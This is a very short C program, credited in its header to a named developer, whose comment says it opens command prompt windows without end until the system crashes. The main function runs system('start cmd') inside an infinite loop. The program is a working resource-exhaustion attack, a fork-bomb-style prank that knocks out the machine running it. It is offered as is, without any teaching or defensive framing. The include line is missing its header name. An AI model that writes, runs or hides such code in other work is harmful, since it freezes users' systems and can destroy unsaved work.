/** * Developer: Minhas Kamal * Functionality: Opens an infinite number of command prompt * window till the system crushes. **/ #include main(){ while(1){ system("start cmd"); } }